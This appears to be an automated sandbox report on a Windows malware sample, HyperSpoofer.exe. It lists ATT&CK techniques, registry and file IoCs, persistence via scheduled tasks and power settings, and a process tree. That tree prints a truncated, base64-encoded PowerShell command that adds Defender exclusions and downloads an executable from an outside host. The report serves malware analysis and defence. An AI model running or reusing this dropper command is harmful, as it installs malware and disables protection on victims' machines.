b55454760356e6ec102c5b3b999488973f8b7baed94eddf9e11be838f0c6901e

Peripheral Device Discovery

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Maps connected drives based on registry 3 TTPs 30 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	DevManView.exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
2164	powercfg.exe
2180	powercfg.exe
3012	powercfg.exe
2888	powercfg.exe
1740	powercfg.exe
2372	powercfg.exe
1340	powercfg.exe
1084	powercfg.exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\MRT.exe	conhostsft.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	VC_redist.x64.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 29 IoCs

pid	Process
2624	HyperSpoofer.exe
2252	VC_redistx64.exe
2252	VC_redistx64.exe
2252	VC_redistx64.exe
2460	service.exe
2252	VC_redistx64.exe
2460	service.exe
2252	VC_redistx64.exe
2460	service.exe
2252	VC_redistx64.exe
2460	service.exe
2252	VC_redistx64.exe
2460	service.exe
2252	VC_redistx64.exe
2460	service.exe
2252	VC_redistx64.exe
2460	service.exe
2252	VC_redistx64.exe
2460	service.exe
2252	VC_redistx64.exe
2460	service.exe
2252	VC_redistx64.exe
2460	service.exe
2252	VC_redistx64.exe
2460	service.exe
2252	VC_redistx64.exe
2460	service.exe
2252	VC_redistx64.exe
2460	service.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2540 set thread context of 2036	2540	VC_redist.x64.exe	289

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Windows NT\Accessories\en-US\WmiPrvSE.exe	sphyperRuntimedhcpSvc.exe
File created	C:\Program Files (x86)\Windows NT\Accessories\en-US\24dbde2999530e	sphyperRuntimedhcpSvc.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\es-ES\sphyperRuntimedhcpSvc.exe	sphyperRuntimedhcpSvc.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\es-ES\fd3894dcf8f87b	sphyperRuntimedhcpSvc.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\INF\setupapi.app.log	DevManView.exe
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1552	sc.exe
2432	sc.exe
1080	sc.exe
920	sc.exe
2128	sc.exe
2476	sc.exe
1544	sc.exe
1924	sc.exe
1516	sc.exe
3040	sc.exe
2740	sc.exe
600	sc.exe
760	sc.exe
568	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HyperSpoofer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	VC_redistx64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	service.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sphyperRuntimedhcpSvc.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2128	PING.EXE

Checks SCSI registry key(s) 3 TTPs 60 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

System Information Discovery

description	ioc	Process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK	DevManView.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK	DevManView.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK	DevManView.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK	DevManView.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK	DevManView.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = b04d431b46e5da01	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2128	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 17 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
1336	schtasks.exe
2904	schtasks.exe
860	schtasks.exe
2060	schtasks.exe
2052	schtasks.exe
1496	schtasks.exe
1576	schtasks.exe
1484	schtasks.exe
2288	schtasks.exe
2896	schtasks.exe
2716	schtasks.exe
3052	schtasks.exe
2608	schtasks.exe
2784	schtasks.exe
2092	schtasks.exe
2440	schtasks.exe
1388	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2660	powershell.exe
2660	powershell.exe
2660	powershell.exe
2660	powershell.exe
2660	powershell.exe
2660	powershell.exe
2660	powershell.exe
2660	powershell.exe
2660	powershell.exe
1704	DevManView.exe
1084	DevManView.exe
1080	DevManView.exe
1252	DevManView.exe
2160	DevManView.exe
1280	DevManView.exe
1164	DevManView.exe
2372	DevManView.exe
1200	DevManView.exe
320	DevManView.exe
2324	DevManView.exe
2320	DevManView.exe
2948	DevManView.exe
1924	DevManView.exe
3060	DevManView.exe
1548	sphyperRuntimedhcpSvc.exe
1548	sphyperRuntimedhcpSvc.exe
1548	sphyperRuntimedhcpSvc.exe
1548	sphyperRuntimedhcpSvc.exe
1548	sphyperRuntimedhcpSvc.exe
1548	sphyperRuntimedhcpSvc.exe
1548	sphyperRuntimedhcpSvc.exe
1548	sphyperRuntimedhcpSvc.exe
1548	sphyperRuntimedhcpSvc.exe
1548	sphyperRuntimedhcpSvc.exe
1548	sphyperRuntimedhcpSvc.exe
1548	sphyperRuntimedhcpSvc.exe
1548	sphyperRuntimedhcpSvc.exe
1548	sphyperRuntimedhcpSvc.exe
1548	sphyperRuntimedhcpSvc.exe
1548	sphyperRuntimedhcpSvc.exe
1548	sphyperRuntimedhcpSvc.exe
1548	sphyperRuntimedhcpSvc.exe
1548	sphyperRuntimedhcpSvc.exe
1548	sphyperRuntimedhcpSvc.exe
1548	sphyperRuntimedhcpSvc.exe
1548	sphyperRuntimedhcpSvc.exe
1548	sphyperRuntimedhcpSvc.exe
1548	sphyperRuntimedhcpSvc.exe
1548	sphyperRuntimedhcpSvc.exe
1548	sphyperRuntimedhcpSvc.exe
1548	sphyperRuntimedhcpSvc.exe
1548	sphyperRuntimedhcpSvc.exe
1548	sphyperRuntimedhcpSvc.exe
1548	sphyperRuntimedhcpSvc.exe
1548	sphyperRuntimedhcpSvc.exe
1548	sphyperRuntimedhcpSvc.exe
1548	sphyperRuntimedhcpSvc.exe
1548	sphyperRuntimedhcpSvc.exe
1548	sphyperRuntimedhcpSvc.exe
1548	sphyperRuntimedhcpSvc.exe
1548	sphyperRuntimedhcpSvc.exe
1548	sphyperRuntimedhcpSvc.exe
1548	sphyperRuntimedhcpSvc.exe
1548	sphyperRuntimedhcpSvc.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1104	lsass.exe

Suspicious behavior: LoadsDriver 20 IoCs

pid	Process
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2660	powershell.exe
Token: SeBackupPrivilege	1704	DevManView.exe
Token: SeRestorePrivilege	1704	DevManView.exe
Token: SeTakeOwnershipPrivilege	1704	DevManView.exe
Token: SeImpersonatePrivilege	1704	DevManView.exe
Token: SeBackupPrivilege	1084	DevManView.exe
Token: SeBackupPrivilege	1080	DevManView.exe
Token: SeRestorePrivilege	1084	DevManView.exe
Token: SeRestorePrivilege	1080	DevManView.exe
Token: SeBackupPrivilege	1252	DevManView.exe
Token: SeTakeOwnershipPrivilege	1084	DevManView.exe
Token: SeBackupPrivilege	320	DevManView.exe
Token: SeTakeOwnershipPrivilege	1080	DevManView.exe
Token: SeBackupPrivilege	2324	DevManView.exe
Token: SeRestorePrivilege	1252	DevManView.exe
Token: SeImpersonatePrivilege	1084	DevManView.exe
Token: SeImpersonatePrivilege	1080	DevManView.exe
Token: SeBackupPrivilege	2160	DevManView.exe
Token: SeBackupPrivilege	1280	DevManView.exe
Token: SeBackupPrivilege	1164	DevManView.exe
Token: SeRestorePrivilege	320	DevManView.exe
Token: SeRestorePrivilege	2324	DevManView.exe
Token: SeTakeOwnershipPrivilege	1252	DevManView.exe
Token: SeRestorePrivilege	2160	DevManView.exe
Token: SeRestorePrivilege	1280	DevManView.exe
Token: SeRestorePrivilege	1164	DevManView.exe
Token: SeTakeOwnershipPrivilege	2160	DevManView.exe
Token: SeTakeOwnershipPrivilege	1280	DevManView.exe
Token: SeTakeOwnershipPrivilege	320	DevManView.exe
Token: SeTakeOwnershipPrivilege	1164	DevManView.exe
Token: SeTakeOwnershipPrivilege	2324	DevManView.exe
Token: SeBackupPrivilege	2372	DevManView.exe
Token: SeBackupPrivilege	1200	DevManView.exe
Token: SeRestorePrivilege	2372	DevManView.exe
Token: SeRestorePrivilege	1200	DevManView.exe
Token: SeTakeOwnershipPrivilege	2372	DevManView.exe
Token: SeTakeOwnershipPrivilege	1200	DevManView.exe
Token: SeLoadDriverPrivilege	1704	DevManView.exe
Token: SeBackupPrivilege	3060	DevManView.exe
Token: SeRestorePrivilege	3060	DevManView.exe
Token: SeTakeOwnershipPrivilege	3060	DevManView.exe
Token: SeBackupPrivilege	1924	DevManView.exe
Token: SeRestorePrivilege	1924	DevManView.exe
Token: SeTakeOwnershipPrivilege	1924	DevManView.exe
Token: SeLoadDriverPrivilege	1704	DevManView.exe
Token: SeBackupPrivilege	2320	DevManView.exe
Token: SeRestorePrivilege	2320	DevManView.exe
Token: SeTakeOwnershipPrivilege	2320	DevManView.exe
Token: SeBackupPrivilege	2948	DevManView.exe
Token: SeRestorePrivilege	2948	DevManView.exe
Token: SeTakeOwnershipPrivilege	2948	DevManView.exe
Token: SeImpersonatePrivilege	1252	DevManView.exe
Token: SeImpersonatePrivilege	2160	DevManView.exe
Token: SeLoadDriverPrivilege	1704	DevManView.exe
Token: SeLoadDriverPrivilege	1704	DevManView.exe
Token: SeImpersonatePrivilege	1280	DevManView.exe
Token: SeLoadDriverPrivilege	1704	DevManView.exe
Token: SeLoadDriverPrivilege	1704	DevManView.exe
Token: SeLoadDriverPrivilege	1704	DevManView.exe
Token: SeLoadDriverPrivilege	1704	DevManView.exe
Token: SeLoadDriverPrivilege	1704	DevManView.exe
Token: SeLoadDriverPrivilege	1704	DevManView.exe
Token: SeLoadDriverPrivilege	1704	DevManView.exe
Token: SeLoadDriverPrivilege	1704	DevManView.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
2624	HyperSpoofer.exe
2252	VC_redistx64.exe
2460	service.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2624 wrote to memory of 2660	2624	HyperSpoofer.exe	30
PID 2624 wrote to memory of 2660	2624	HyperSpoofer.exe	30
PID 2624 wrote to memory of 2660	2624	HyperSpoofer.exe	30
PID 2624 wrote to memory of 2660	2624	HyperSpoofer.exe	30
PID 2660 wrote to memory of 2696	2660	powershell.exe	32
PID 2660 wrote to memory of 2696	2660	powershell.exe	32
PID 2660 wrote to memory of 2696	2660	powershell.exe	32
PID 2660 wrote to memory of 2696	2660	powershell.exe	32
PID 2660 wrote to memory of 2528	2660	powershell.exe	34
PID 2660 wrote to memory of 2528	2660	powershell.exe	34
PID 2660 wrote to memory of 2528	2660	powershell.exe	34
PID 2660 wrote to memory of 2528	2660	powershell.exe	34
PID 2660 wrote to memory of 2576	2660	powershell.exe	35
PID 2660 wrote to memory of 2576	2660	powershell.exe	35
PID 2660 wrote to memory of 2576	2660	powershell.exe	35
PID 2660 wrote to memory of 2576	2660	powershell.exe	35
PID 2660 wrote to memory of 2252	2660	powershell.exe	36
PID 2660 wrote to memory of 2252	2660	powershell.exe	36
PID 2660 wrote to memory of 2252	2660	powershell.exe	36
PID 2660 wrote to memory of 2252	2660	powershell.exe	36
PID 2696 wrote to memory of 1928	2696	HpsrSpoof.exe	37
PID 2696 wrote to memory of 1928	2696	HpsrSpoof.exe	37
PID 2696 wrote to memory of 1928	2696	HpsrSpoof.exe	37
PID 2528 wrote to memory of 2516	2528	sphyperRuntimedhcpSvc.exe	38
PID 2528 wrote to memory of 2516	2528	sphyperRuntimedhcpSvc.exe	38
PID 2528 wrote to memory of 2516	2528	sphyperRuntimedhcpSvc.exe	38
PID 2528 wrote to memory of 2516	2528	sphyperRuntimedhcpSvc.exe	38
PID 1928 wrote to memory of 2120	1928	cmd.exe	40
PID 1928 wrote to memory of 2120	1928	cmd.exe	40
PID 1928 wrote to memory of 2120	1928	cmd.exe	40
PID 2252 wrote to memory of 836	2252	VC_redistx64.exe	41
PID 2252 wrote to memory of 836	2252	VC_redistx64.exe	41
PID 2252 wrote to memory of 836	2252	VC_redistx64.exe	41
PID 2252 wrote to memory of 836	2252	VC_redistx64.exe	41
PID 836 wrote to memory of 1496	836	cmd.exe	43
PID 836 wrote to memory of 1496	836	cmd.exe	43
PID 836 wrote to memory of 1496	836	cmd.exe	43
PID 836 wrote to memory of 1496	836	cmd.exe	43
PID 2696 wrote to memory of 712	2696	HpsrSpoof.exe	44
PID 2696 wrote to memory of 712	2696	HpsrSpoof.exe	44
PID 2696 wrote to memory of 712	2696	HpsrSpoof.exe	44
PID 712 wrote to memory of 1704	712	cmd.exe	46
PID 712 wrote to memory of 1704	712	cmd.exe	46
PID 712 wrote to memory of 1704	712	cmd.exe	46
PID 712 wrote to memory of 1200	712	cmd.exe	47
PID 712 wrote to memory of 1200	712	cmd.exe	47
PID 712 wrote to memory of 1200	712	cmd.exe	47
PID 712 wrote to memory of 1164	712	cmd.exe	48
PID 712 wrote to memory of 1164	712	cmd.exe	48
PID 712 wrote to memory of 1164	712	cmd.exe	48
PID 712 wrote to memory of 2372	712	cmd.exe	49
PID 712 wrote to memory of 2372	712	cmd.exe	49
PID 712 wrote to memory of 2372	712	cmd.exe	49
PID 712 wrote to memory of 1280	712	cmd.exe	50
PID 712 wrote to memory of 1280	712	cmd.exe	50
PID 712 wrote to memory of 1280	712	cmd.exe	50
PID 712 wrote to memory of 2324	712	cmd.exe	51
PID 712 wrote to memory of 2324	712	cmd.exe	51
PID 712 wrote to memory of 2324	712	cmd.exe	51
PID 712 wrote to memory of 1084	712	cmd.exe	52
PID 712 wrote to memory of 1084	712	cmd.exe	52
PID 712 wrote to memory of 1084	712	cmd.exe	52
PID 712 wrote to memory of 320	712	cmd.exe	53
PID 712 wrote to memory of 320	712	cmd.exe	53

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\HyperSpoofer.exe
"C:\Users\Admin\AppData\Local\Temp\HyperSpoofer.exe"
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2624
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAeAB4ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcwB6AGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbABuAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZQBzAGQAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBIAHAAcwByAFMAcABvAG8AZgAuAGUAeABlACcALAAgADwAIwBpAHQAcQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAeAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHoAcgBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEgAcABzAHIAUwBwAG8AbwBmAC4AZQB4AGUAJwApACkAPAAjAGUAcABmACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZ